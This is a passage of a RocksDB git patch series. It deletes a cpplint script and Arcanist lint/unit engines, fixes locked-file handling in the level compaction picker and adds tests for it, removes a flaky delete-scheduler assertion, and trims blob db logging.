-def CheckMakePairUsesDeduction(filename, clean_lines, linenum, error):
-  """Check that make_pair's template arguments are deduced.
-
-  G++ 4.6 in C++0x mode fails badly if make_pair's template arguments are
-  specified explicitly, and such use isn't intended in any case.
-
-  Args:
-    filename: The name of the current file.
-    clean_lines: A CleansedLines instance containing the file.
-    linenum: The number of the line to check.
-    error: The function to call with any errors found.
- """ - line = clean_lines.elided[linenum] - match = _RE_PATTERN_EXPLICIT_MAKEPAIR.search(line) - if match: - error(filename, linenum, 'build/explicit_make_pair', - 4, # 4 = high confidence - 'For C++11-compatibility, omit template arguments from make_pair' - ' OR use pair directly OR if appropriate, construct a pair directly') - - -def ProcessLine(filename, file_extension, clean_lines, line, - include_state, function_state, nesting_state, error, - extra_check_functions=[]): - """Processes a single line in the file. - - Args: - filename: Filename of the file that is being processed. - file_extension: The extension (dot not included) of the file. - clean_lines: An array of strings, each representing a line of the file, - with comments stripped. - line: Number of line being processed. - include_state: An _IncludeState instance in which the headers are inserted. - function_state: A _FunctionState instance which counts function lines, etc. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: A callable to which errors are reported, which takes 4 arguments: - filename, line number, error level, and message - extra_check_functions: An array of additional check functions that will be - run on each source line. Each function takes 4 - arguments: filename, clean_lines, line, error - """ - raw_lines = clean_lines.raw_lines - ParseNolintSuppressions(filename, raw_lines[line], line, error) - nesting_state.Update(filename, clean_lines, line, error) - if nesting_state.stack and nesting_state.stack[-1].inline_asm != _NO_ASM: - return - CheckForFunctionLengths(filename, clean_lines, line, function_state, error) - CheckForMultilineCommentsAndStrings(filename, clean_lines, line, error) - CheckStyle(filename, clean_lines, line, file_extension, nesting_state, error) - CheckLanguage(filename, clean_lines, line, file_extension, include_state, - nesting_state, error) - CheckForNonConstReference(filename, clean_lines, line, nesting_state, error) - CheckForNonStandardConstructs(filename, clean_lines, line, - nesting_state, error) - CheckVlogArguments(filename, clean_lines, line, error) - CheckPosixThreading(filename, clean_lines, line, error) - CheckInvalidIncrement(filename, clean_lines, line, error) - CheckMakePairUsesDeduction(filename, clean_lines, line, error) - for check_fn in extra_check_functions: - check_fn(filename, clean_lines, line, error) - -def ProcessFileData(filename, file_extension, lines, error, - extra_check_functions=[]): - """Performs lint checks and reports any errors to the given error function. - - Args: - filename: Filename of the file that is being processed. - file_extension: The extension (dot not included) of the file. - lines: An array of strings, each representing a line of the file, with the - last element being empty if the file is terminated with a newline. - error: A callable to which errors are reported, which takes 4 arguments: - filename, line number, error level, and message - extra_check_functions: An array of additional check functions that will be - run on each source line. 
Each function takes 4 - arguments: filename, clean_lines, line, error - """ - lines = (['// marker so line numbers and indices both start at 1'] + lines + - ['// marker so line numbers end in a known way']) - - include_state = _IncludeState() - function_state = _FunctionState() - nesting_state = _NestingState() - - ResetNolintSuppressions() - - CheckForCopyright(filename, lines, error) - - if file_extension == 'h': - CheckForHeaderGuard(filename, lines, error) - - RemoveMultiLineComments(filename, lines, error) - clean_lines = CleansedLines(lines) - for line in xrange(clean_lines.NumLines()): - ProcessLine(filename, file_extension, clean_lines, line, - include_state, function_state, nesting_state, error, - extra_check_functions) - nesting_state.CheckCompletedBlocks(filename, error) - - CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error) - - # We check here rather than inside ProcessLine so that we see raw - # lines rather than "cleaned" lines. - CheckForBadCharacters(filename, lines, error) - - CheckForNewlineAtEOF(filename, lines, error) - -def ProcessFile(filename, vlevel, extra_check_functions=[]): - """Does google-lint on a single file. - - Args: - filename: The name of the file to parse. - - vlevel: The level of errors to report. Every error of confidence - >= verbose_level will be reported. 0 is a good default. - - extra_check_functions: An array of additional check functions that will be - run on each source line. Each function takes 4 - arguments: filename, clean_lines, line, error - """ - - _SetVerboseLevel(vlevel) - - try: - # Support the UNIX convention of using "-" for stdin. Note that - # we are not opening the file with universal newline support - # (which codecs doesn't support anyway), so the resulting lines do - # contain trailing '\r' characters if we are reading a file that - # has CRLF endings. - # If after the split a trailing '\r' is present, it is removed - # below. If it is not expected to be present (i.e. os.linesep != - # '\r\n' as in Windows), a warning is issued below if this file - # is processed. - - if filename == '-': - lines = codecs.StreamReaderWriter(sys.stdin, - codecs.getreader('utf8'), - codecs.getwriter('utf8'), - 'replace').read().split('\n') - else: - lines = codecs.open(filename, 'r', 'utf8', 'replace').read().split('\n') - - carriage_return_found = False - # Remove trailing '\r'. - for linenum in range(len(lines)): - if lines[linenum].endswith('\r'): - lines[linenum] = lines[linenum].rstrip('\r') - carriage_return_found = True - - except IOError: - sys.stderr.write( - "Skipping input '%s': Can't open for reading\n" % filename) - return - - # Note, if no dot is found, this will give the entire filename as the ext. - file_extension = filename[filename.rfind('.') + 1:] - - # When reading from stdin, the extension is unknown, so no cpplint tests - # should rely on the extension. - if filename != '-' and file_extension not in _valid_extensions: - sys.stderr.write('Ignoring %s; not a valid file name ' - '(%s)\n' % (filename, ', '.join(_valid_extensions))) - else: - ProcessFileData(filename, file_extension, lines, Error, - extra_check_functions) - if carriage_return_found and os.linesep != '\r\n': - # Use 0 for linenum since outputting only one error for potentially - # several lines. 
- Error(filename, 0, 'whitespace/newline', 1, - 'One or more unexpected \\r (^M) found;' - 'better to use only a \\n') - - sys.stderr.write('Done processing %s\n' % filename) - - -def PrintUsage(message): - """Prints a brief usage string and exits, optionally with an error message. - - Args: - message: The optional error message. - """ - sys.stderr.write(_USAGE) - if message: - sys.exit('\nFATAL ERROR: ' + message) - else: - sys.exit(1) - - -def PrintCategories(): - """Prints a list of all the error-categories used by error messages. - - These are the categories used to filter messages via --filter. - """ - sys.stderr.write(''.join(' %s\n' % cat for cat in _ERROR_CATEGORIES)) - sys.exit(0) - - -def ParseArguments(args): - """Parses the command line arguments. - - This may set the output format and verbosity level as side-effects. - - Args: - args: The command line arguments: - - Returns: - The list of filenames to lint. - """ - try: - (opts, filenames) = getopt.getopt(args, '', ['help', 'output=', 'verbose=', - 'counting=', - 'filter=', - 'root=', - 'linelength=', - 'extensions=']) - except getopt.GetoptError: - PrintUsage('Invalid arguments.') - - verbosity = _VerboseLevel() - output_format = _OutputFormat() - filters = '' - counting_style = '' - - for (opt, val) in opts: - if opt == '--help': - PrintUsage(None) - elif opt == '--output': - if val not in ('emacs', 'vs7', 'eclipse'): - PrintUsage('The only allowed output formats are emacs, vs7 and eclipse.') - output_format = val - elif opt == '--verbose': - verbosity = int(val) - elif opt == '--filter': - filters = val - if not filters: - PrintCategories() - elif opt == '--counting': - if val not in ('total', 'toplevel', 'detailed'): - PrintUsage('Valid counting options are total, toplevel, and detailed') - counting_style = val - elif opt == '--root': - global _root - _root = val - elif opt == '--linelength': - global _line_length - try: - _line_length = int(val) - except ValueError: - PrintUsage('Line length must be digits.') - elif opt == '--extensions': - global _valid_extensions - try: - _valid_extensions = set(val.split(',')) - except ValueError: - PrintUsage('Extensions must be comma separated list.') - - if not filenames: - PrintUsage('No files were specified.') - - _SetOutputFormat(output_format) - _SetVerboseLevel(verbosity) - _SetFilters(filters) - _SetCountingStyle(counting_style) - - return filenames - - -def main(): - filenames = ParseArguments(sys.argv[1:]) - - # Change stderr to write with replacement characters so we don't die - # if we try to print something containing non-ASCII characters. - sys.stderr = codecs.StreamReaderWriter(sys.stderr, - codecs.getreader('utf8'), - codecs.getwriter('utf8'), - 'replace') - - _cpplint_state.ResetErrorCounts() - for filename in filenames: - ProcessFile(filename, _cpplint_state.verbose_level) - _cpplint_state.PrintErrorCounts() - - sys.exit(_cpplint_state.error_count > 0) - - -if __name__ == '__main__': - main() diff --git a/arcanist_util/lint_engine/FacebookFbcodeLintEngine.php b/arcanist_util/lint_engine/FacebookFbcodeLintEngine.php deleted file mode 100644 index 88b0748f7d5..00000000000 --- a/arcanist_util/lint_engine/FacebookFbcodeLintEngine.php +++ /dev/null @@ -1,138 +0,0 @@ -getPaths(); - - // Remove all deleted files, which are not checked by the - // following linters. 
- foreach ($paths as $key => $path) { - if (!Filesystem::pathExists($this->getFilePathOnDisk($path))) { - unset($paths[$key]); - } - } - - $generated_linter = new ArcanistGeneratedLinter(); - $linters[] = $generated_linter; - - $nolint_linter = new ArcanistNoLintLinter(); - $linters[] = $nolint_linter; - - $text_linter = new ArcanistTextLinter(); - $text_linter->setCustomSeverityMap(array( - ArcanistTextLinter::LINT_LINE_WRAP - => ArcanistLintSeverity::SEVERITY_ADVICE, - )); - $linters[] = $text_linter; - - $java_text_linter = new ArcanistTextLinter(); - $java_text_linter->setMaxLineLength(100); - $java_text_linter->setCustomSeverityMap(array( - ArcanistTextLinter::LINT_LINE_WRAP - => ArcanistLintSeverity::SEVERITY_ADVICE, - )); - $linters[] = $java_text_linter; - - $python_linter = new ArcanistPEP8Linter(); - $linters[] = $python_linter; - - $cpp_linters = array(); - $cpp_linters[] = $linters[] = new ArcanistCpplintLinter(); - $cpp_linters[] = $linters[] = new FbcodeCppLinter(); - - $clang_format_linter = new FbcodeClangFormatLinter(); - $linters[] = $clang_format_linter; - - $spelling_linter = new ArcanistSpellingLinter(); - $linters[] = $spelling_linter; - - foreach ($paths as $path) { - $is_text = false; - - $text_extensions = ( - '/\.('. - 'cpp|cxx|c|cc|h|hpp|hxx|tcc|'. - 'py|rb|hs|pl|pm|tw|'. - 'php|phpt|css|js|'. - 'java|'. - 'thrift|'. - 'lua|'. - 'siv|'. - 'txt'. - ')$/' - ); - if (preg_match($text_extensions, $path)) { - $is_text = true; - } - if ($is_text) { - $nolint_linter->addPath($path); - - $generated_linter->addPath($path); - $generated_linter->addData($path, $this->loadData($path)); - - if (preg_match('/\.java$/', $path)) { - $java_text_linter->addPath($path); - $java_text_linter->addData($path, $this->loadData($path)); - } else { - $text_linter->addPath($path); - $text_linter->addData($path, $this->loadData($path)); - } - - $spelling_linter->addPath($path); - $spelling_linter->addData($path, $this->loadData($path)); - } - if (preg_match('/\.(cpp|c|cc|cxx|h|hh|hpp|hxx|tcc)$/', $path) - && !preg_match('/third-party/', $path)) { - foreach ($cpp_linters as &$linter) { - $linter->addPath($path); - $linter->addData($path, $this->loadData($path)); - } - - $clang_format_linter->addPath($path); - $clang_format_linter->addData($path, $this->loadData($path)); - $clang_format_linter->setPathChangedLines( - $path, $this->getPathChangedLines($path)); - } - - // Match *.py and contbuild config files - if (preg_match('/(\.(py|tw|smcprops)|^contbuild\/configs\/[^\/]*)$/', - $path)) { - $space_count = 4; - $real_path = $this->getFilePathOnDisk($path); - $dir = dirname($real_path); - do { - if (file_exists($dir.'/.python2space')) { - $space_count = 2; - break; - } - $dir = dirname($dir); - } while ($dir != '/' && $dir != '.'); - - $cur_path_linter = $python_linter; - $cur_path_linter->addPath($path); - $cur_path_linter->addData($path, $this->loadData($path)); - - if (preg_match('/\.tw$/', $path)) { - $cur_path_linter->setCustomSeverityMap(array( - 'E251' => ArcanistLintSeverity::SEVERITY_DISABLED, - )); - } - } - } - - $name_linter = new ArcanistFilenameLinter(); - $linters[] = $name_linter; - foreach ($paths as $path) { - $name_linter->addPath($path); - } - - return $linters; - } - -} diff --git a/arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php b/arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php deleted file mode 100644 index 2e0148141a9..00000000000 --- a/arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php +++ /dev/null @@ -1,27 +0,0 @@ -getPaths() as $path) { - 
// Don't try to lint deleted files or changed directories. - if (!Filesystem::pathExists($path) || is_dir($path)) { - continue; - } - - if (preg_match('/\.(cpp|c|cc|cxx|h|hh|hpp|hxx|tcc)$/', $path)) { - $paths[] = $path; - } - } - - $howtoeven = new FacebookHowtoevenLinter(); - $howtoeven->setPaths($paths); - return array($howtoeven); - } -} diff --git a/arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php b/arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php deleted file mode 100644 index 62c275f6a94..00000000000 --- a/arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php +++ /dev/null @@ -1,17 +0,0 @@ -setName("dummy_placeholder_entry"); - $result->setResult(ArcanistUnitTestResult::RESULT_PASS); - return array($result); - } -} diff --git a/arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php b/arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php deleted file mode 100644 index 985bd68fc26..00000000000 --- a/arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php +++ /dev/null @@ -1,17 +0,0 @@ -setName("dummy_placeholder_entry"); - $result->setResult(ArcanistUnitTestResult::RESULT_PASS); - return array($result); - } -} From ffd2a2eefdc6ad4223dff57a4ae1735b701c198a Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 19 Jul 2017 20:26:46 -0700 Subject: [PATCH 019/205] delete ExpandInputsToCleanCut failure log Summary: I decided not even to keep it as an INFO-level log as it is too normal for compactions to be skipped due to locked input files. Removing logging here makes us consistent with how we treat locked files that weren't pulled in due to overlap. We may want some error handling on line 422, which should never happen when called by `LevelCompactionBuilder::PickCompaction`, as `SetupInitialFiles` skips compactions where overlap causes the output level to pull in locked files. Closes https://github.com/facebook/rocksdb/pull/2617 Differential Revision: D5458502 Pulled By: ajkr fbshipit-source-id: c2e5f867c0a77c1812ce4242ab3e085b3eee0bae --- db/compaction_picker.cc | 5 ----- 1 file changed, 5 deletions(-) diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 6795227b5c9..f06351c70ce 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -234,11 +234,6 @@ bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name, // If, after the expansion, there are files that are already under // compaction, then we must drop/cancel this compaction. if (AreFilesInCompaction(inputs->files)) { - ROCKS_LOG_WARN( - ioptions_.info_log, - "[%s] ExpandWhileOverlapping() failure because some of the necessary" - " compaction input files are currently being compacted.", - cf_name.c_str()); return false; } return true; From a22b9cc6fe2853f62672f35462226413a82af262 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 19 Jul 2017 20:33:52 -0700 Subject: [PATCH 020/205] overlapping endpoint fixes in level compaction picker Summary: This diff addresses two problems. Both problems cause us to miss scheduling desirable compactions. One side effect is compaction picking can spam logs, as there's no delay after failed attempts to pick compactions. 1. If a compaction pulled in a locked input-level file due to user-key overlap, we would not consider picking another file from the same input level. 2. If a compaction pulled in a locked output-level file due to user-key overlap, we would not consider picking any other compaction on any level. The code changes are dependent, which is why I solved both problems in a single diff. 
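As a rough illustration of the fix (a toy sketch only, not RocksDB's actual types or the code in this diff; here `locked` stands in for a candidate failing the `ExpandInputsToCleanCut()` / `FilesRangeOverlapWithCompaction()` checks), the picker now falls back to the next-largest candidate instead of giving up:

```cpp
#include <cstdio>
#include <vector>

// Hypothetical stand-in for an input-level candidate file.
struct Candidate {
  unsigned long long file_size;
  bool locked;  // models clean-cut expansion pulling in a pending compaction
};

// Candidates are assumed sorted largest-first, as the real picker iterates
// them. Before this fix, the first locked candidate aborted the whole pick;
// now it is skipped and the next-largest file is tried.
int PickFileToCompact(const std::vector<Candidate>& by_size_desc) {
  for (size_t i = 0; i < by_size_desc.size(); ++i) {
    if (by_size_desc[i].locked) {
      continue;  // previously: the pick failed here
    }
    return static_cast<int>(i);
  }
  return -1;  // no eligible file on this input level
}

int main() {
  // The largest file (index 0) is locked; the fixed picker chooses index 1.
  std::vector<Candidate> files = {{100, true}, {90, false}};
  std::printf("picked index %d\n", PickFileToCompact(files));
  return 0;
}
```

The concrete code changes: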
- Moved input-level `ExpandInputsToCleanCut` into the loop inside `PickFileToCompact`. This gives two benefits: (1) if it fails, we will try the next-largest file on the same input level; (2) we get the fully-expanded input-level key-range with which we can check for pending compactions in the output level.
- Added another call to `ExpandInputsToCleanCut` inside `PickFileToCompact` to check for compaction conflicts in the output level.
- Deleted the call to `IsRangeInCompaction` in `PickFileToCompact`, as `ExpandInputsToCleanCut` also correctly handles the case where original output-level files (i.e., ones not pulled in due to user-key overlap) are pending compaction.
Closes https://github.com/facebook/rocksdb/pull/2615

Differential Revision: D5454643

Pulled By: ajkr

fbshipit-source-id: ea3fb5477d83e97148951af3fd4558d2039e9872
---
 db/compaction_picker.cc      | 42 +++++++++++++-------
 db/compaction_picker_test.cc | 74 ++++++++++++++++++++++++++++++++++++
 2 files changed, 103 insertions(+), 13 deletions(-)

diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc
index f06351c70ce..6ee4ebd1f16 100644
--- a/db/compaction_picker.cc
+++ b/db/compaction_picker.cc
@@ -1101,11 +1101,7 @@ void LevelCompactionBuilder::SetupInitialFiles() {
   }
   output_level_ =
       (start_level_ == 0) ? vstorage_->base_level() : start_level_ + 1;
-  if (PickFileToCompact() &&
-      compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                 &start_level_inputs_) &&
-      !compaction_picker_->FilesRangeOverlapWithCompaction(
-          {start_level_inputs_}, output_level_)) {
+  if (PickFileToCompact()) {
     // found the compaction!
     if (start_level_ == 0) {
       // L0 score = `num L0 files` / `level0_file_num_compaction_trigger`
@@ -1346,16 +1342,36 @@ bool LevelCompactionBuilder::PickFileToCompact() {
       nextIndex = i;
     }

-    // Do not pick this file if its parents at level+1 are being compacted.
-    // Maybe we can avoid redoing this work in SetupOtherInputs
-    parent_index_ = -1;
-    if (compaction_picker_->IsRangeInCompaction(vstorage_, &f->smallest,
-                                                &f->largest, output_level_,
-                                                &parent_index_)) {
-      continue;
-    }
     start_level_inputs_.files.push_back(f);
     start_level_inputs_.level = start_level_;
+    if (!compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
+                                                    &start_level_inputs_) ||
+        compaction_picker_->FilesRangeOverlapWithCompaction(
+            {start_level_inputs_}, output_level_)) {
+      // A locked (pending compaction) input-level file was pulled in due to
+      // user-key overlap.
+      start_level_inputs_.clear();
+      continue;
+    }
+
+    // Now that input level is fully expanded, we check whether any output files
+    // are locked due to pending compaction.
+    //
+    // Note we rely on ExpandInputsToCleanCut() to tell us whether any output-
+    // level files are locked, not just the extra ones pulled in for user-key
+    // overlap.
+    InternalKey smallest, largest;
+    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
+    CompactionInputFiles output_level_inputs;
+    output_level_inputs.level = output_level_;
+    vstorage_->GetOverlappingInputs(output_level_, &smallest, &largest,
+                                    &output_level_inputs.files);
+    if (!output_level_inputs.empty() &&
+        !compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
+                                                    &output_level_inputs)) {
+      start_level_inputs_.clear();
+      continue;
+    }
     base_index_ = index;
     break;
   }
diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc
index 2e34e9ab277..1ced12cfd5d 100644
--- a/db/compaction_picker_test.cc
+++ b/db/compaction_picker_test.cc
@@ -852,6 +852,80 @@ TEST_F(CompactionPickerTest, OverlappingUserKeys9) {
   ASSERT_EQ(8U, compaction->input(1, 1)->fd.GetNumber());
 }

+TEST_F(CompactionPickerTest, OverlappingUserKeys10) {
+  // Locked file encountered when pulling in extra input-level files with same
+  // user keys. Verify we pick the next-best file from the same input level.
+  NewVersionStorage(6, kCompactionStyleLevel);
+  mutable_cf_options_.max_compaction_bytes = 100000000000u;
+
+  // file_number 2U is largest and thus first choice. But it overlaps with
+  // file_number 1U which is being compacted. So instead we pick the next-
+  // biggest file, 3U, which is eligible for compaction.
+  Add(1 /* level */, 1U /* file_number */, "100" /* smallest */,
+      "150" /* largest */, 1U /* file_size */);
+  file_map_[1U].first->being_compacted = true;
+  Add(1 /* level */, 2U /* file_number */, "150" /* smallest */,
+      "200" /* largest */, 1000000000U /* file_size */, 0 /* smallest_seq */,
+      0 /* largest_seq */);
+  Add(1 /* level */, 3U /* file_number */, "201" /* smallest */,
+      "250" /* largest */, 900000000U /* file_size */);
+  Add(2 /* level */, 4U /* file_number */, "100" /* smallest */,
+      "150" /* largest */, 1U /* file_size */);
+  Add(2 /* level */, 5U /* file_number */, "151" /* smallest */,
+      "200" /* largest */, 1U /* file_size */);
+  Add(2 /* level */, 6U /* file_number */, "201" /* smallest */,
+      "250" /* largest */, 1U /* file_size */);
+
+  UpdateVersionStorageInfo();
+
+  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
+      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
+  ASSERT_TRUE(compaction.get() != nullptr);
+  ASSERT_EQ(2U, compaction->num_input_levels());
+  ASSERT_EQ(1U, compaction->num_input_files(0));
+  ASSERT_EQ(1U, compaction->num_input_files(1));
+  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
+  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
+}
+
+TEST_F(CompactionPickerTest, OverlappingUserKeys11) {
+  // Locked file encountered when pulling in extra output-level files with same
+  // user keys. Expected to skip that compaction and pick the next-best choice.
+  NewVersionStorage(6, kCompactionStyleLevel);
+  mutable_cf_options_.max_compaction_bytes = 100000000000u;
+
+  // score(L1) = 3.7
+  // score(L2) = 1.85
+  // There is no eligible file in L1 to compact since both candidates pull in
+  // file_number 5U, which overlaps with a file pending compaction (6U). The
+  // first eligible compaction is from L2->L3.
+  Add(1 /* level */, 2U /* file_number */, "151" /* smallest */,
+      "200" /* largest */, 1000000000U /* file_size */);
+  Add(1 /* level */, 3U /* file_number */, "201" /* smallest */,
+      "250" /* largest */, 1U /* file_size */);
+  Add(2 /* level */, 4U /* file_number */, "100" /* smallest */,
+      "149" /* largest */, 5000000000U /* file_size */);
+  Add(2 /* level */, 5U /* file_number */, "150" /* smallest */,
+      "201" /* largest */, 1U /* file_size */);
+  Add(2 /* level */, 6U /* file_number */, "201" /* smallest */,
+      "249" /* largest */, 1U /* file_size */, 0 /* smallest_seq */,
+      0 /* largest_seq */);
+  file_map_[6U].first->being_compacted = true;
+  Add(3 /* level */, 7U /* file_number */, "100" /* smallest */,
+      "149" /* largest */, 1U /* file_size */);
+
+  UpdateVersionStorageInfo();
+
+  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
+      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
+  ASSERT_TRUE(compaction.get() != nullptr);
+  ASSERT_EQ(2U, compaction->num_input_levels());
+  ASSERT_EQ(1U, compaction->num_input_files(0));
+  ASSERT_EQ(1U, compaction->num_input_files(1));
+  ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber());
+  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
+}
+
 TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri1) {
   NewVersionStorage(6, kCompactionStyleLevel);
   mutable_cf_options_.level0_file_num_compaction_trigger = 2;

From 3e5ea29a83270e8a0a93afe471022fc41adc8180 Mon Sep 17 00:00:00 2001
From: Islam AbdelRahman
Date: Thu, 20 Jul 2017 11:22:31 -0700
Subject: [PATCH 021/205] Fix Flaky DeleteSchedulerTest::ImmediateDeleteOn25PercDBSize

Summary:
In this test we are deleting 100 files, and we are expecting DeleteScheduler to delete 26 files in the background and 74 files immediately in the foreground. The main purpose of the test is to make sure that we delete files in the foreground thread, which is verified on line 546.

But sometimes we may end up with 26 or 25 files in the trash directory because the background thread may be slow and not able to delete the first file fast enough, so sometimes this test fails.

Remove
```
ASSERT_EQ(CountFilesInDir(trash_dir_), 25);
```
since it does not have any benefit anyway.
Closes https://github.com/facebook/rocksdb/pull/2618

Differential Revision: D5458674

Pulled By: IslamAbdelRahman

fbshipit-source-id: 5556a9edfa049db71dce80b8e6ae0fdd25e1e74e
---
 util/delete_scheduler_test.cc | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc
index 6667289185f..208bdd74177 100644
--- a/util/delete_scheduler_test.cc
+++ b/util/delete_scheduler_test.cc
@@ -541,10 +541,9 @@ TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) {
     delete_scheduler_->DeleteFile(file_name);
   }

-  // When we end up with 24 files in trash we will start
+  // When we end up with 26 files in trash we will start
   // deleting new files immediately
   ASSERT_EQ(fg_delete_file, 74);
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 25);

   rocksdb::SyncPoint::GetInstance()->DisableProcessing();
 }

From 0302da47a7f5be2a400572477f4bdb8ddc4af5f3 Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Thu, 20 Jul 2017 14:52:58 -0700
Subject: [PATCH 022/205] Reduce blob db noisy logging

Summary:
Remove some of the per-key logging by blob db to reduce noise.
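For illustration, the change follows a common pattern: tally outcomes inside the loop and emit one summary log line afterwards, instead of one line per key. A minimal sketch of that pattern (toy code, with a plain `fprintf` standing in for `ROCKS_LOG_INFO`; names are illustrative, not the blob db API):

```cpp
#include <cstdio>
#include <vector>

// Toy stand-in for draining a queue of compacted values: instead of logging
// each success or failure, count them and log a single summary at the end.
void EvictCompacted(const std::vector<bool>& eviction_results) {
  size_t total_vals = 0;
  size_t mark_evicted = 0;
  for (bool succeeded : eviction_results) {
    total_vals++;
    if (succeeded) {
      mark_evicted++;
    }
  }
  std::fprintf(stderr,
               "Mark %zu values to evict, out of %zu compacted values.\n",
               mark_evicted, total_vals);
}

int main() {
  EvictCompacted({true, false, true});
  return 0;
}
```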
Closes https://github.com/facebook/rocksdb/pull/2587

Differential Revision: D5429115

Pulled By: yiwu-arbug

fbshipit-source-id: b89328282fb8b3c64923ce48738c16017ce7feaf
---
 utilities/blob_db/blob_db_impl.cc | 72 +++++++++++--------------------
 1 file changed, 26 insertions(+), 46 deletions(-)

diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc
index 6ee91d5f96b..1dd72b6bc3a 100644
--- a/utilities/blob_db/blob_db_impl.cc
+++ b/utilities/blob_db/blob_db_impl.cc
@@ -59,20 +59,14 @@ namespace rocksdb {
 namespace blob_db {

 struct GCStats {
-  uint64_t blob_count;
-  uint64_t num_deletes;
-  uint64_t deleted_size;
-  uint64_t num_relocs;
-  uint64_t succ_deletes_lsm;
-  uint64_t succ_relocs;
-  std::shared_ptr<BlobFile> newfile;
-  GCStats()
-      : blob_count(0),
-        num_deletes(0),
-        deleted_size(0),
-        num_relocs(0),
-        succ_deletes_lsm(0),
-        succ_relocs(0) {}
+  uint64_t blob_count = 0;
+  uint64_t num_deletes = 0;
+  uint64_t deleted_size = 0;
+  uint64_t num_relocs = 0;
+  uint64_t succ_deletes_lsm = 0;
+  uint64_t overrided_while_delete = 0;
+  uint64_t succ_relocs = 0;
+  std::shared_ptr<BlobFile> newfile = nullptr;
 };

 // BlobHandle is a pointer to the blob that is stored in the LSM
@@ -1487,8 +1481,6 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size,

   // file was deleted
   if (hitr == blob_files_.end()) {
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Could not find file_number %" PRIu64, file_number);
     return false;
   }

@@ -1522,24 +1514,22 @@ std::pair<bool, int64_t> BlobDBImpl::EvictCompacted(bool aborted) {
   if (aborted) return std::make_pair(false, -1);

   override_packet_t packet;
+  size_t total_vals = 0;
+  size_t mark_evicted = 0;
   while (override_vals_q_.dequeue(&packet)) {
-    bool succ = FindFileAndEvictABlob(packet.file_number_, packet.key_size_,
-                                      packet.blob_offset_, packet.blob_size_);
-
-    if (!succ)
-      ROCKS_LOG_DEBUG(
-          db_options_.info_log,
-          "EVICT COMPACTION FAILURE SN: %d FN: %d OFFSET: %d SIZE: %d",
-          packet.dsn_, packet.file_number_, packet.blob_offset_,
-          packet.blob_size_);
-
-    if (debug_level_ >= 3)
-      ROCKS_LOG_INFO(
-          db_options_.info_log,
-          "EVICT COMPACTED SN: %d FN: %d OFFSET: %d SIZE: %d SUCC: %d",
-          packet.dsn_, packet.file_number_, packet.blob_offset_,
-          packet.blob_size_, succ);
+    bool succeeded =
+        FindFileAndEvictABlob(packet.file_number_, packet.key_size_,
+                              packet.blob_offset_, packet.blob_size_);
+    total_vals++;
+    if (succeeded) {
+      mark_evicted++;
+    }
   }
+  ROCKS_LOG_INFO(db_options_.info_log,
+                 "Mark %" ROCKSDB_PRIszt
+                 " values to evict, out of %" ROCKSDB_PRIszt
+                 " compacted values.",
+                 mark_evicted, total_vals);
   return std::make_pair(true, -1);
 }

@@ -1810,21 +1800,11 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr,
       txn->Delete(cfh, record.Key());
       Status s1 = txn->Commit();
       // chances that this DELETE will fail is low. If it fails, it would be
-      // because
-      // a new version of the key came in at this time, which will override
-      // the current version being iterated on.
-      if (s1.IsBusy()) {
-        ROCKS_LOG_INFO(db_options_.info_log,
-                       "Optimistic transaction failed delete: %s bn: %" PRIu32,
-                       bfptr->PathName().c_str(), gcstats->blob_count);
-      } else {
-        ROCKS_LOG_DEBUG(
-            db_options_.info_log,
-            "Successfully added delete back into LSM: %s bn: %" PRIu32,
-            bfptr->PathName().c_str(), gcstats->blob_count);
-
+      // because a new version of the key came in at this time, which will
+      // override the current version being iterated on.
+      if (!s1.IsBusy()) {
         // assume that failures happen due to new writes.
-        gcstats->succ_deletes_lsm++;
+        gcstats->overrided_while_delete++;
       }
       delete txn;
       continue;

From 63163a8c6eb12b03608a80216ea169e5b0b022c8 Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Thu, 20 Jul 2017 20:28:43 -0700
Subject: [PATCH 023/205] Remove make_new_version.sh

Summary:
Seems the only function of the script is to create a new branch, which can be done easily. I'm removing it.
Closes https://github.com/facebook/rocksdb/pull/2623

Differential Revision: D5468681

Pulled By: yiwu-arbug

fbshipit-source-id: 87dea5ecc4c85e06941ccbc36993f7f589063878
---
